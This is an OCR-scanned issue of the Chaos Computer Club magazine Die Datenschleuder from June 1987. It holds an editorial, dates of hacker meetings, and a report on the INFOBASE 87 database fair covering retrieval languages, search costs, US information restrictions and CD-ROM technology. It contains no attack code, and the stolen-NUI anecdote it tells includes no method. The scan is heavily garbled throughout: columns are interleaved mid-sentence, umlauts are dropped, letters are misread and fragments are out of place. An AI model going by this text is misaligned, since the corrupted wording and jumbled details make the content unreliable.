M J>> fr

28.08. - 30.08. Sysoptreffen in Berlin Der IPN, C C C u n d C A C laden z u m Treffen der Mailboxbetreiber. Veranstaltungsort ist der Mehringhof in Berlin. A n m e l d u n g bei: I P N , H.Nopper, Bmsendorfer Str. 2 0 , 1 Berlin 44.

28.08. - 14.09. Internationale Funkausstellung Berlin D i e Konsumelektronik lt Gren. Hackertreff Dienstag am Poststand um 16 Uhr.

Lieber D A T E N S CHLEUDER-Leser, einige D i n g e begreifen selbst wir recht spt. Andere Herausgeber angefhrt. Das hat sich mit dieser Ausgabe auch gendert. Herausgeber ist nunmehr der Chaos Computer C l u b e.V. und Verantwortlich i m Sinne des Pressegesetzes ist Reinhard Schrutzki. Das hat aber nur Bedeutung auf dem Papier und bei allflligen D i e D A T E N S C H L E U D E R erscheint nunmehr i m dritten Jahr. Nacheinerlngeren schpferischen Pause im letzten Jahr haben wir es geschafft, wieder einigermassen regelmig herauszukommen. Das ist nicht zuletzt PeterGlaser zu verdanken, den wir trotz -oder wegen - seines Abstandes zum C C C im Zuge einer psyD a hinter demProjekt D A T E N S C H L E U D E R auch Menschen stecken, hat so mancher Abonnent doppelt und dreifach zu spren bekommen: so oft haben manche nmlich die jeweils aktuelle Ausgabe zugeschickt erhalten. In der Aboverwaltung hat es Irrungen und Wirrungen gegeben. Es wird daran gearbeitet, sie zu beseitigen. Deshalb hier wieder die Bitte, Nachsicht zu ben, wenn mal wieder etwas nicht ganz wie vorgesehen klappt. Dazu siehe auch Teststop-Publishing war fr die Redaktion noch nie ein Fremdwort, aber erst die Entwicklungen der ab 19 Uhr in den jngsten Zeit, unter anderem die zauberhaften Nicht geklappt hat in der letzten Ausgabe die drucktechnische Wiedergabe des Bestellfetzens. Offenbar war unsere Vorlage zu blass. Ergebnis war eine mit kryptischen leeren Feldern gemusterte Seite. Nur wenige Leser haben entsprechend reagiert und nach dem Moto " R a u m fr eigene Eintragungen" Fehlendes selbst ergnzt. Textkonvertierungs- und Filterprogramme von Vic, machen es uns erstmals in der Menschheitsgeschichte mglich, die Druckvorlagen in Eigenarbeit zu erstellen. A m gerchteumrankten Prototypen fr den chaotypischen Vierfarbkartoffeldruck wird weiterhin rege gearbeitet. Schwierigkeiten bereitet der Druckertreiber und die Frage, ob auf gentechnischem W e g eine Matrix-Kartoffel gezchtet, oder besser ein Kartoffelgaslaser entwickelt werden soll. Reinhard Schrutzki Der C C C ist seit mehr als einem Jahr ein eingetragener Verein. Z u seinen Aufgaben gehrt laut Satzung auch die Herausgabe der D A T E N S C H L E U D E R . W i r hatten es bisher beim alten Stand belassen und W a u als Saiciirl|(ciicr ^rSic SntctiSdjIcubcr Numero 21 - Juni 1987 editor21.ds 198706032000 gobiin den Beitrag " V o n Menschen und M u s e n " i m vorliegenden Heft. Rechtstreitigkeiten. Die DATENS C H L E U D E R ist und bleibt ein Produkt, das von einer Gruppe berwiegend gleichgesinnter (u nd gleichgestreter) Menschen produziert wird.

12.09. - 13.09. CCC-Workshop in Hamburg Beginn der Testphase von B T X N E T . Mailboxbetreiber beginnen mit Testbetrieb eines eigenen Netzes. Ort: Eidelstedter Brgerhaus. A u f Einladung. 19.10. - 23.10. S Y S T E M S in MUchnchen Hackenreff Dienstag am Poststand 16 Uhr. 28.12. - 29.12. Chaos Communication Congress 1987 - H a m b u r g D i e europische Hackerpaity. Nheres im Oktober.

begreifen wir, versumen es aber, entsprechend zu handeln. Folgerichtig bleibtEtliches liegen und wartet darauf, aufgearbeitet zu werden. D a s sei hiermit getan.

M b x : keine Meldung Treffen: Jeden 2. Samstag, 14- 19Uhr im Jugendpark unter der Zoobriicke Sachsenbergstr. (Nicht in den Sommerferien).

Weitere Hinweise in den Btx-Programmendes C C C , C A C und der B H P . Erreichbar ber *655322.

K , A Bitla nichl \ vargsn CCC Chaos Computer C l u b e.V. Schwenkestrae 85 D-2000 H a m b u r g 2 0 Tel: 040-4903757 (040-483752) Blx: 655321 M b x : Geol:Chaos-Team Clinch:Chaos-Team Treffen: Dienstags gegen 19 Uhr in der I L E

BHP Bayerische Hackerpost c/o B A S I S Adaibertsr. 41b D-8000 Mnchen 40 Tel: 089-808447 B t x : ( 3 2 ) *92049204 Mbx: IFX1: BHP-RED Treffen: Jeden Donnerstag Mathser-Stuben (U-Bahn Messegelnde oder SBahn Hackerbriicke) in der 3. W o c h e ist es ein Freitag! IPN Inter Pool Net e.V. (Verein von Mailboxbetreibern) c/o J.Schiitte Veledastrae 2 D-5000 K l n 1 Tel: 0221-381418 Btx: n M b x : 0221-387686 ( 3 8 N 1 D ) Treffen: Nchstes Treffen zur I F A in Berlin. Adressen und Treffen, soweit sie uns vorliegen. Keine Gewhr fr die Angaben. ^jfP^Sic

chologischen Geiselnahme als Scheffredaktr gekapert haben. Mit Hilfe eines erlauchten Kreises von Zuarbeitern (huhu D i d i !!) hat sich die DATENS C H L E U D E R zu dem entwickelt, was jetzt in Euren/Ihren Hnden liegt.

CCC-Berlin (Ortsgruppe) c/o V i n y l B o o g i e Gleditschstratie 45 D - l 0 0 0 Berlin 30 Seite 2 N u m e r o 2 1 - J u n i 1987

Seite 3

Die Quatsch-Explosion Bericht von der ONLINE-Tagung / INFOBASE 87 in Frankfurt


- so bezeichnete ein Vortragender auf der ONLINE-Tagung wahrend der Infobase 87 in Frankfurt die ungeheure Zunahme an Datenbanken und deren Qualitt. Viele Datenbankanbieter begngten sich einfach damit, Fachzeitschriften o.. abzuschreiben. Diese werden dann schlicht hiniereinanderweg eingespeist, einen Abstract und eine Stichwortzuordnung gibt es oft nicht. Sinnvoll, so der allgemeine Gmndtenor, sei aber die Volltextdatenbank nur in einigen wenigen Ausnahmen. Besser arbeiten Hesse sich mit Datenbanken, die einen Abstracl bten und/oder auf die Quelle verwiesen. Allen Datenbanken gemeinsam aber ist, dass sie durchschnittlich 12-24 Monate hinter der Aktualitt herhinken. Ausnahme ist da z.B. eine Datenbank, die die Urteile des hchsten US-amerikanischen Gerichts beinhaltet. Hat der Richter sein Urteil gesprochen, wird ihm der Urtcilstcxt aus der Hand gerissen, jemand strzt damit zum Schreibpool und das Urteil wird in die Datenbank eingefgt. So ist es mglich, da dieseUrteile schon wenigeStunden nach Verkilndungabrufbar sind. Aids3omnot, VWWW und Zvei - von Grips, Stairs bis CCL reicht das Spektrum bei Datenbanken. Thomas M. Koch (Koch Consult. Frankfurt/Main) gab einige qualitative Anhaltspunkte zur Auswahl einer Datenbank: - Einfachheit im Aufbau - Abfragemethoden, die der natrlichen menschlichen Sprache angepat sind - Relationale Verknpfungsmglichkeiten - Automatisierte Lieferang von intelligenten Entscheidungsvorschlgen frrelationaleDatenbanksuche
- Flexible Kommunikalionsschniustellen

- Mischung von Textdaten, numerischen Daten und Grafiken im Computer des Anwenders. Dies sei nur sehr selten alles zusammen bei einem Hosi realisiert, Jedoch sollte man darauf hinarbeiten, da dies geschehe. Fr Koch steht jede Datenbank auf drei Sulen: - Qualitt - Geschwindigkeit - Preis

Zum Schlu noch die Auflsung der Datenbankkrzel von oben: "Aids" ist, wie mancher sich schon gedacht haben wird, eine Datenbank ber Aids; in "Bonmot" kann man Spruche und Zitate abrufen; "VWWW" kommt natrlich von VW und beinhaltet Informationen zum Kfz-Bau; "Zvei" ist ein Einkaufsfhrer durch die Elektro- und Elektronikindustrie. "Grips", "Stairs", "CCL" - das sind Namen von Retrievalsprachen (Such-). Sie sollen den Fragesteller in die Lage Das "Who is Who - Jahrbuch zur Infobase 87", Adressbuch der versetzen, schnell und einfach seine Antwort zu finden. ONLINEszene Uber Personen, Finnen. Datenbanken, deren Inwieweit das zutrifft ist fraglich. Es scheint, da etliche Produzenten und Anbieter, verzeichnet Stichwrter zu etwa Datenbankbenutzer sich beim Einsatz dieser Sprachen die 3.200 Datenbanken. I (DM 29,50 zu beziehen bei: B. Team, B. Breidenstein GmbH, Haare raufen: so viele Glatzkpfe wie auf dieser Messe sieht man sonst selten auf einem Haufen. Durchaus verstndlich, Untermainkai 83.6 Frankfurt 1) bedenkt man, da es etwa so viele Retrieval- wie Programmiersprachen gibt, von denen es wiederum (Basic-)Dialekte gibt. Im Gegensatz zu Programmiersprachen kann sich der Benutzer jedoch meist nicht aussuchen, in welcher RetrievalDas Angebot ist gro genug (so gro, da es schon wieder sprache er seine Frage stellen mchte. Jeder Host, teilweise Datenbanken ber Datenbanken gibt). Fehlen nur noch die jede Datenbank auf einem Host, verlangt eine andere Sprache. Benutzer. Als Hauptmngel der Datenbanken sind aufzufhren: Nun gibt es Retricvalsprachen, die verhalten sich wie Basic- Die Organisationsstruktur (Indexierung) der Datenbanken. Dialekte zueinander. Ein bestimmter Grundbefehlssatz gleicht Sie ist oft so angelegt, da man erst einmal nach nach dem richtigen Stichwort suchen mu, bevor man mit der eigentli- sich stark, die Syntaxregeln sind dieselben. Andere Retrievalsprachen vehalten sich wie Assembler zu Lisp: nichts gechen Recherche beginnen kann. meinsam. Sorichtignett wird es fr den Benutzer aber erst, - Mangel an Informationen. wenn die Befehle gleichlauten, die Syntax jedoch eine andere Datenbanken, die zu einem speziellen Gebiet nicht alle Informationen, auch die aktuellen, enthalten, haben wenig Sinn. ist. So sucht man unter Stairs (IBM) mit dem Kommando "..sea" fr "search". Das wird dann erweitert, z.b. "..sea Chaos Die Retrieval-(Such)-Sprachen sind derart unterschiedlich, da man sich meist nur auf einem Host (Rechner, der Daten- Computer Club and BTX". Doch unter Brs/Search (Bertelsmann) lauter das Kommando entweder "..search" oder "..s" I banken anbietet) auskennen kann. Dazu spter unter Grips, ("..s Chaos Computer Club or Hacker"). Befindet man sich ' Stairs, CCL... mehr. jedoch auf einem Host der die Common Command Language - Oft exsisiiert die notwendige Hardware nicht. Es entstehen (CCL) der Europischen Gemeinschaft verwendet (z.b. Echo), Amchaffungskosten. die viele abschrecken. so lautet der Befehl "f" fr find ("f Chaos Computer Club not - Beim Zugriff auf Datenbanken auerhalb der BRD oder Chaos Communication Congress"). Europas kommt es des fteren zu Problemen, (siehe Knowledge Means Money). - Eine Datenbankrecherche ist relativ teuer. Es ist eine genaue Abwgung notwendig, ob dieses neue Medium wirtschaftlich GRIPS wiederum isteineErweileiung (=DiaIekt) von CCL. Es eingesetzt werden kann. (Exemplarische Kosten-Nuizenkennt zustzliche zu den CCL Kommandos TAB Kommandos Recfinung s.u.). (Ausgabe von ProfiltabelleintiSgen = bereits eingegebene und - Einige Datenbankproduzenten scheinen nach dem Ex-undhopp Prinzip zu produzieren. In letzter Zeitgabesnichtnur eine verknpfte Suchbegriffe), MAIL Kommandos (fr Briefe an den Host) und ORDER Kommandos (zum Bestellen von DoQuatsch-Explosion sondern auch ein erstaunliches Verkumenten). schwinden von Datenbanken ohne Ankndigung vom Markt. Seite 4 Numero 21 - Juni 1987

Dietmar Strauch (PROGRIS - Projektgruppe Informations- Turorials (Lemdiketten): systeme GmbH. Berlin) stellte in seinem Vonrag "Fourth Generation Retrieval Software - blicken Sie noch durch?" eine DSO (Data Star Online) rosige Zukunft unter dem Schwort 'Konfigurierbarkeit' dar: wird unter dem Namen TECPU- Programmierte Unterweisung "Die Aufgabe der nchsten Zeit besteht darin, Bauksten fr fr Retrievalsprche DSO vom Fachinformationszentrum Benulzerschnitlstellen zu entwerfen, aus denen dann benut- Technik fr zerorientiert bzw. anwendungsspezifisch konkrete Ausfor- DM 35,- vertrieben. mungen gebildet werden knnen. Perspektivisch wird diese (Fiz-Technik), Postfach 600547, Osihahnhofstrasse 13, Entwicklung dazu fhren, da wir im Gebiet der Dialogtech- 6 Frankfurt 1, Tel. 069-4308-225, Telex 4189459 fizt d) niken zu einer Benutzerprogrammierung kommen. Jeder Benutzer stellt,gesttzlauf wissensbasierte Komponenten, die fr ihn geeignete Schnittstelle aus den zur Verfgung stehenden JURIS Beim Verlag C.H. Beck (Postfach, 8 Mnchen 40) gibts eine Elementen zusammen." Schulungsdiskelte fr 118 DM und einen DialogschulungsNa den mal tau! Das wird viele Neueinsteiger abschrecken. (Plastik)-Ordner (beinahe so dick wie ein Schnefelder oder Bevor die ihre erste Abfrage machen knnen mssen sie erst Satorius) fr 148 DM. mal den Host maschneidem (-regeln). So schn das auch (DSO und JURIS fr 220 DM). wre, aber nur gebte Datenbankbenutzer werden in der Lage sein, diese Schnittstellen zu programmieren (fr alle anderen). Im Grunde bietet jeder Hostbetreiber Schulungsseminare an, Wer sich nher mitRetrievalsprachen beschftigen will, sei auf wenn man bei ihm einen Vertrag unterschrieben hat Die folgende Publikationen hingewiesen: Zeitung OLBG-Info, Das Nachrichtenblatt der deutschen ONLINE-Benutzergruppe in der DGD e.V. (Deutsche Ge- Information Retrieval mitGrips/Dirs3. Kurzbeschreibung dersellschaft fr Dokumentation e.V., Westendstrae 19,6 Frankwichtigsten Grips/Dirs3-Kommandos fr den LINE-MODE. furt 1) im Heft 1/2 1987 ber den Quick-Guide fr KomanStand: April 1984. Redaktion: Ingrid Criiger (Sfl- dosprachen: Retrievalhfen 2); Frankfurt am Main: gid, 1984 (Adresse "Die britische ONLINE-Benutzergruppe hat uns mitgeteilt, unten); 64 Seilen DIN A4, geheftet DM 10,00.-. da sie den Ukolog Quick Guide to ONLINE Commands 1987 - Information Retrieval mi t Grips/Dirs3. Kurzbeschreibung derherausgegeben hat Darin werden die Kommandos der 12 wichtigsten Grips/Dirs3 Kommandos fr den PAGE-MODE. meistgenutzten Hosts (wie Data Star, Dialog, Dimidi, Blaise, Stand: April 1984. Redaktion: Ingrid Crger (Sft- Esa-Iris, Infoline-SDC, STN, Telesystems, Questel, Datasolve Retrievalhilfen 2); Frankfurt am Main: gid, 1984 (Adresse u.a.) auf 4 Seiten in Tabellenform fr den schnellen Zugriff am unten); 65 Seiten DIN A4, geheftet DM 10,00 Terminal aufgelistet. Ein Informationsblatt zum Quick Guide kann bei Sheila Webber, British Library, 2 Sheraton Street, Diese beiden Hefle sind Einfhrungen in die Abfragesprache London W 1V 4 BH, Tel. 01-636-1544, angefordert werden. Grips/Dirs3 anhand von Beispielen. Sie sind filr Grips/Dirs3 Den Quick-Guide kann man zum Preis von lObritischen Pfund Benutzer geschreiben und sollen dem Anfnger als Gedch- bestellen bei: Institute of Information Scientists, 44 Museum nisstlze und spter als Nachschlagewerk bei der Arbeit am Street, London WC IA 1LY, Tel. 01-831-8003." Bildschirm dienen. Einige mgen erstaunt sein ber die Datumsangaben (Stand...) - Information Retrieval mit STAIRS. Kurzbeschreibung der in den Datenbanken. Dies ist jedoch verstndlich, wenn man wichtigsten STAIRS-Kommandos anhand von Beispielen. die Klage von Dr. Hans Schiannann (Anwalt) in seinem VorStand: Juli .1982. Radaktion: Ingrid Criiger (Sft- trag (JURIS-Dalenbank in der Kanzlei) hrt. Er spricht davon, Retrievalhilfen 1); Frankfurt am Main: gid, 1982 (Adresse da es nicht ausreiche, einmal eine Retrievalsprache zu lernen. Stndig gebe es Erweiterungen und nderungen, man msse unten); 81 Seiten DIN A4, geheftet DM 10,00.-. Aus dem Inhalt: eine Einfhrung in das Information Retrieval also andauernd sein Wissen aktualisieren. Fr einen Rechtmit STAIRS/Vs - Allgemeines zur Dialog-Struktur eines sanwalt meist eine - wegen Zeitmangels - nicht lsbare AufSTAIRS Dokuments - Aufbau einer STAIRS-Datenbank - gabe. Folgerung: Software mu her, die die Suche erleichtert, Zugriffsschulz Eingangsdialog - Beschreibung der STAIRS- mit der man auf allen Hosts die gleiche Benutzeroberflche hat. Befehle. Diese Idee hatte die Firma Softcontrol (Fahrenkrn 125, 2 Diese drei Werke sind zu beziehen bei: Hamburg 71, Tel. 040-6432766. GEO1: Softkontrol) auch. Sie entwickelte das Programm METALOG. Es bietet eine einGesellschaft fr Information und Dokumentation (gid) heitliche Benutzeroberflche fr (bisher) die Hosts Juris, DiZentralbereich Ergebnistransfer midi, dpa, Genios, Data Star (je 250 DM) und die Mailboxen Postfach 710363 GEOl, GE03 und Telebox (je 150 DM). Als Grundlage beLyoner Strasse 44-48 ntigt man das Programm Terminal Control (490 DM). MED-6000 Frankfurt 71 TALOG bietet dann eine Men-Pull-Down-Abfrage. Die wenige Erfahrungen, die man auf der Messe damit sammeln Darber hinaus: konnte (an dpa hier nochmals vielen Dank: war sehr informativ), zeigten: wenn man ungefhr wei, wie man vorzugehen "Das unsichtbare Element - CCL-Training" hat, z.b. welche Datenbank auf einem Host man anzuwhlen hat, um an die gesuchten Informationen zu kommen, kann man Handbuch fr Benutzer, Euronet Diane. Zusammengestellt von: Gruppe zur Frderung der Europi- Recherchen durchfhren, ohne bermig viel lernen zu miisschen Fachinformationsmarktes, 177, Route d Esch, L-1471 Luxembourg, Tele.: 352-488041, Telex: 2181; Kontakipersonen; Herr Haber, Herr Cornelius. ^ f f ^ r S i e S)atenSd)fciibct Numero 71 - Juni 1987 Seite 5

( ^ V i c SnicnSrfjreubcr

hnliche Gedanken machte sich die Firma Bertelsmann. Fr ihre Patent-Datenbank PATOS und die von ihnen angebotenen deutschsprachigen Wirtschaftsdatenbanken entwickelten sie MENTOR, eine vereinfachte Benutzerfilhning. Im Gegensatz zu METALOG, das auf dem PC des Benutzeis luft, luft MENTOR auf dem Host. Das hat den Voneil, da es allen Hostbenutzem zur Verfgung steht und man nicht an eine bestimmte Hardware (bei METALOG IBM oder 100% kompatibel) gebunden ist. Whlt man sich zu Bertelsmann durch, fragt einen der Host, ob man mit BRS/Search (s.o.) oder MENTOR arbeiten will. Whlt man letzteres an, untersttzt einen MENTOR mit Bedienungshinweisen, Datenbankbeschreibungen, Hinweisen zu Eingabemglichkeiten und -formaten, sowie zu Menverzweigungen ber Steuerfunktionen und mit ausgearbeiteten Suchstrategien. MENTOR zeigtin der Kopfzeile das Krzel der Datenbank, die aktuelle Seitennummer und Anzahl der Folgeseiten (Gesamtseitenzahl) und in der Fuzeile mgliche Steuerfunktionen. Als Befehle stehen zur Verfgung: AZ = Anzeigen von Dokumenten, EN = Ende der Recherche. EX = Wechsel zu BRS/Search, ME = Auswahl-EinstiegsmenU, MQ = Auswahl Hier setztauch die Kritik an: Informationen sollten nicht wegen ihrer elektronischen Verfgbarkeit gesperrt werden drfen. Meist ist auch eine "nur" Beschrnkung von Datenbanken ineffizient, da es einfach zu viele Verbreitungswege gibt Als Beschrnkungsmanahmen wurden in der Vergangenheit z.B. spezielle Pawrter an Auslnder, die damit nur beschrnkten Zugriff auf die Datenbank(-en) hatten. DieNASAlegteeine Liste von Datenbanken mitauslndischen Nutzern an. Diese Datenbanken bekamen keine als "classified" eingestuften Daten mehr von der NASA. Auch bekamen Datenbankanbieter Besuch von Mitarbeitern der DOD. CIA etc. Sie sollten ihre Kundenlisten herausrcken, und bekanntgeben, wer sich fr was interessiert. Es wird geschtzt, da die bisherigen Zugangsbeschrnkungen einen wirtschaftlichen Schaden von 9 Milliarden Dollar = 200.000 Arbeitspltze hinterlassen hat. Die Entwicklung in der Bundesrepublik geht dahin, jedem den Zugang zu Datenbanken zu gestatten, gleichzeitig jedoch auch keinen "Freedom of Information Act" als Gesetz einzufhren.

FootprintontheDesk Mit diesem unbersetzbaren amerikanischen Idiom ist der Platz auf dem Schreibtisch gemeint, den der Computer einnimmt. Ein Datenbankanbieter hat diesen "Footprint on the Desk" auf dem Schreibtisch seines Kunden. Dieser Footprint kostet den Kunden einen nicht unbetrchtlichen Betrag. Grob gesagt kostet eine Stunde Datenbankrecherche zwischen 300 und 500 DM. Eine durchschnittliche Recherche ist mit 20-30 Min bei einem gebten Rechercheur anzusetzen. Darin enthalten sein knnen die Datex-Gebhren (kommt darauf an, wie teuer die Datenbank ist), jedoch sind nicht enthalten: Lohn-oder Gehaltskosten (ein Spitzenknner auf diesem Gebiet kann durchaus noch einmal soviel (und mehr) pro Stunde kosten), Amortisation der Hard- und Software u.. Lohnen sich bei desen Preisen berhaupt Datenbanken? Dr. Heinrich Ulmer (AUDI AG, Ingolstadt) stellte dazu am Beispiel JURIS folgende Kosten-Nutzen-Rechnung auf: frher: 20 x 1,5-2 Std. Bibliothek = 35 Std./Monat +10x1 Std. Fahrzeit = 10 Std./Monat 45 Std./Monat heute: 20 x 15-20 min JURIS Dialog = 6 Std./Monat +20 x 15-20 min Bibliothek = 6 Std./Monat + 3 x 1 Std. Fahrzeit = 3 StdVMonat 15 StdVMonat Zeitdifferenz: 30 StdVMonat 30 x DM 130.- = DM 3900.-. Demgegenber stehen monatliche Kosten fr JURIS: Hardware-Kostenbeitrag Wartung Gebhren Bundespost Gebhren JURIS Sonstige Kosten (z.B. Schulung, Information, Material) DM 300.-. DM 100.-. DM 500.-. DM600.-.

des Sachgebietes - Informationsquelle,MB=Neue Suche, SOS = Hilfstexte. Hilft das alles nichts, gibt es zwei weitere Mglichkeiten: Entweder SOS oder der Griff zum Bertelsmann Sorgen-Telefon. Ober den Bertelsmann-Host in Gtersloh gibt es ein Gateway zu BRS (Host) in USA. Dort gibt es 140 Datenbanken zu den unterschiedlichsten Sachbgebieten, jedoch noch nicht mit MENTOR Untersttzung. Bei der Bertelsmann Presse Konferenz wurde dann beides vorgefhlt, MENTOR wie auch BRS. Heraus kam, da auch der weltgrte Medienkonzern nur mit Wasser, sprich 300 Baud Epson Koppler, kocht, ebenfalls auf Datex warten mu, im brigen aber etwas von PR versteht. So nebenbei erfuhr man, da bei der letzten Infobase jemand erfolgreich den Bertelsmann-Leuten ber die Schulter geschaut hatte. Zwei Monate spterriefdie Post an und fragte, ob es denn mormal sei, da man jetzt so oft Datenbanken und Mailboxen in Kanada benutzen wrde. Im brigen mge man doch bitte die Rechnung ber 16.000 DM begleichen. Die NUI fand sich dann auch in einer Mailbox. und jemand wurde dingfest gemacht, der gleich ein paar NUIs bei sich rumliegen hatte. Der Nachweis, da dieser Jemand die NUI auch genutzt hat, sei jedoch bei einem Telefonanschlu relativ schwierig. Nhre Informationen (Uber Datenbanken, nicht ber NUI's) bei: Bertelsmann Informations Service GmbH, Neumarkier Strafe 18, 8 Mnchen 80. Tel. 089-43189-0, Telex: vbmue 523259.

Ebenfalls bei Bertelsmann kam die Sprache auf MEGADOC, das ist die Gruner&Jahr-Datenbank (STERN-Archiv etc.). Fr Journalisten, die nicht dem Hause Gruner&Jahr angehren, gibt es die Mglichkeit der Offline-Recherche, d.h. man richtetDagegen ist bei den CD-ROMs und der CD-I-Technik inan G&J eine Datenbankanfrage (Herr Linau, Tel.:040/4118- zwischen alles standardisiert Die Firmen Philips und Sony 2051). Die fhren nach den Spezifikationen die Recherche geben zusammen folgende "Bchel" heraus, durch die Lidurch (Durchschnittliche Recherche = 1 Std. Aufwand, etwa 40 zenzen vergeben werden: Seiten Textausdiuck - ca. 320 DM) und schicken dann das Ergebnis an den Fragesteller. RED BOOK Knowledge means money Knowledge is power + Time is money = Knowledge means money. So fatChelleO'Connell, einzige Informations-Brokerin Buffalos (USA) ihre Ttigkeit zusammen. Die US A sind das Land, das am freizgigsten mit ihren Informationen umgeht. Der "Freedom of Information Act" sichert jedem Weltbrger das Recht zu, alle Daten einzusehen, die nicht geheim sind, dem Datenschutz unterliegen oder als sog. "propriatory information" eigentumsrechtlich geschtzt sind.

Teilweise wurden bereits Westeuroper von technischen Konferenzen ausgeschlossen. Derlei Dinge zeichnen sich auch immer mal wieder - bei Datenbanken ab. Treibende Kraft ist das Department of Defense (DOD; siehe auch Artikel "Megacontrol" in der DATENSCHLEUDER Nr.20). Ein groer Teil der US-amerikanischen Forschung wird vom DOD finanziert. Diese Machtposition wurde in der Vergangenheit oft dazu genutzt die Forschung zu Geheimhaltung zu verpflichten. Die Richtlinie NSDD 145 definiert "sensitive Daten" als solche, deren Nutzen, Vernderung oder Zerstrung (negativen) Einflu auf die Entwicklung (in) den USA haben knnte. Die US - Amerikaner haben schnell erkannt, da Datenbanken eine vollkommen neue Qualitt von Informationsbeschaffung bedeuteten. Die Folge war, da viele Daten nur wegen ihrer elektronischen Verfgbarkeit fr geheim erklrt wurden.

Es beschreibt die physikalischen Spezifikationen der Compxt Disk. YELLOW BOOK Datencodierung und Datenformate auf CD-ROM, ScrambleVerfahren, Fehlereikennung und Korrektur. GREEN BOOK CD-I Hard- und Software.

DM400.DM 1900.-.

m
N u m e r o 21 - Juni 1987

^ f ^ C S i e nicnarfjleiibcr

Unter dem Namen "High Sierra Proposal" wurde ein Text bekannt, der Uber die Angaben im Yellow Book hinaus die Volumen und Filestniktur der CD-Rom regelt. Die "High Sierra Group", so benannt nach dem Ort ihres eisten ZusamSeit etwa 10 Jahren gibt es jedoch eine Diskussion in den USA mentreffens, ist ein Zusammenschlu von Firmen, die aktiv ber Beschrnkungen von Informationen, die Auslnder be- oder passiv an der CD-ROM Entwicklung interessiert sind. treffen. Auch bei der Firma Hitachi (Rungedamm 2,2 HH 80, Tele.: 040/73411-214) wurden konkrete Zahlen genannt. Die vier CD-Player fr den Computereinsatz, 3 Stand-Alone-andBeside Gerte und ein Einbaugert fr den IBM-AT (mit dem Disk-Controller zu betreiben), sind fr je 2.500 DM zu haben. Sie lesen CD-ROMs mit 552 MB Speicherkapazitt mit einer Zugriffszeit von 0.5-1 Sekunde und einer Datenaustauschrate von 176 KB/s. Hitachi gab zudem die CD-ROM Produktionskosten mit etwa 10.000 DM (sehr stark aufwandsabhngig) an. Da dann erst eine CD-ROM existiert und meist mehr bentigt werden, gab man den weiteren Hinweis auf einen Stckpreis von ca 20 DM. bei einer Auflage von 1000 Stck.

Seite 6

t ^ ^ S l i c

Sfltcn3ri)lciibcc

N u m e r o 2 1 - J u n i 1987

Seite 7

Somit Ersparnis monatlich ca DM 2000.Ebenfalls Bertelsmann zeigte einen WORM-(Write Once Read Many)-Speicher (200 MByte - 2 GByte). Im Gegensatz zb den CD-Roms gibt auf diesem Gebiet jedoch noch keine internationale Vereinbarung Uber das Speicherformat. Die physikalischen Formale reichen von 5 1/4" bis 14", die Speicherformate von 200 MByte bis 4 GByte. Zudem gibt es viele verschiedene Versionen der Technik. Die Zeitschrift PASS WORD ("Praxisberater fr elektronische Schn war die CD-I Anwendung, die in Anstzen bei Hitachi Informationsbeschaffung", Handelsblatt Verlag, Postf. 1102, zu sehen war. CD-I steht fr Compact Disk Interactiv. Das Kasemenstr. 67,4 Dsseldorf 1, Tel. 0211/83880) berichtete bedeutet, da von dieser CD-I nicht nur Daten sondern auch in ihrer Nr.5/87 ber eine EUSIDIC-Untersuchung ber Preise Ton, Bild und/oder Film geliefen wird. Hitachi zeigt eine der Postverwaltnngen in Europa fr eine 20 min/1200 BaudDemonstrations CD-ROM einer amerikanischen EnzyklopRecherche bei einer kostenfreien Datenbank (z.B. ECHO): die, die schon sehr nahe an dieses Ziel herankam. Man sucht Demnach ist die Bundesrepublik wirklich Spitzenreiter, d i teuerste Pflaster. Die Liste fngt an bei der Bundesrepublik mit nach einem bestimmten Stichwort, der Text wird angezeigt, 4,86 ECU (European Count but not yet Cash Unit) an, und hrt farbig unterlegt sind die Stichworte zu dem weitere Informationen abrufbar. Zudem sind bei vielen Eintrgen Bilder und auf bei Platz 16, Irland, 0,90 EKuh. Bei Europischen VerTon abrufbar. So z.B. ist unter dem Stichwort "Bach" eine bindungen weiden wir (5,75 EQ) in einem spanneden Finish Lebens-und Werkbeschreibung abrufbar, die Abbildung einer | von Finnland (5,81 IQ) auf Platz zwo verwiesen. Partitur sowie ein dazu passender Ton-AusschnitL Bei Schlachten wird dann ein Bild mit dem Schlachtverlauf und Bei diesen Berechnungen ist die 1.April-Knebelung (und alle einer passenden Schlachtmusik geliefert. Noch weiter gehts dachten April, April...) noch nicht bercksichtigt. Sptestens unter dem Stichwort DNA: Etwa ein Viertel des Screens wird seitdem waren wir wegen 800%-Verteuerung absoluter von einen um sich selbst rotierenden DNA-MoleklNegativ-Spitzenreiter. Besonders begeistert ber die Erhhung Ausschmttmodell eingenommen. Die Audio-Branche hat diewar man auf dem GENIOS-(Winschaftsdatenbanken)-Stand. ses neue Spielzeug auch schon fr sich entdeckt. Noch in Die Damen und Herren sitzen in Dsseldorf in ihrem Bro, diesem Jahr sollen CD-Player auf den Markt kommen, die die blicken vom Screen auf, schauen aus dem Fenster und erneuen Scheiben abspielen knnen, dann gibts 20 Minuten blicken ein Postgebude, von dem bekannt ist, da sich darin der schwatze Kasten - auch PD genannt- versteckt, um ab und Musikvideo auf CD. an mal wieder "Datex-P: Auslsung durch Gegenstelle" abzuschicken. Nichtzdesdotrotz macht der Gebhrenzhler alle Insgesamt war die INFOBASE 87 eine lohnende Messe - wenn 50 Sekundeneinen Tickweiter, wahrscheinlich biszum 1.7.87. man sie sich leisten konnte: Der Eintritt von 50 DM fr alle Neuester Stand der Dinge ist , da die DBP die Gebhren Tage war sicherch nicht der entscheidende Punkt, sondern die wahischeinlich zum 1.7.1987 wieder dem allen Zustand von Beitrge, die fr die Symposien usw. gezahlt werden muten, vor dem 1. April anpassen will. wollte man an ihnen teilnehmen (z.B. 390 DM fr eine Tagung). Die aber waren das eigentlich Interessante. Dort lernte man die Leute kennen, dort wurden Informationen und Erfahrungen gleich gebndelt und durchaus kritisch weitergeCD-ROM, CD-I und WORM geben. Glaubt man den Herstellern, dann sind CD-ROMs die Renner der Zukunft. Gleich mehrere Finnen stellten Anwendungen auf Das eigentliche Messegeschehen war mehr eine Ergnzung zu den anderen Veranstaltungen. Dort wurden Einzelgesprche diesem Gebiet vor. gefhrt, kamen Anwender mit Spezialproblemen zu den DaExemplarisch sei hier Beitelsmann genannt, die neben dem ja schon bekannten "Wer liefert was?", auch die Bibel, das Ortsund Straen Verzeichnis der DBP, und eine Pharmakologische tenbankanbietem. Es wurden sicherlich bei vielen die notDatenbankauf CD-ROM vorfhrten. Interessenten machte die wendige Erklrungsgesprche gefhrt. Andrerseits mute sich Bertelsmann Tochterfiima BCB (Bertelsmann Computer Be- z.B. ein JURIS-Boss 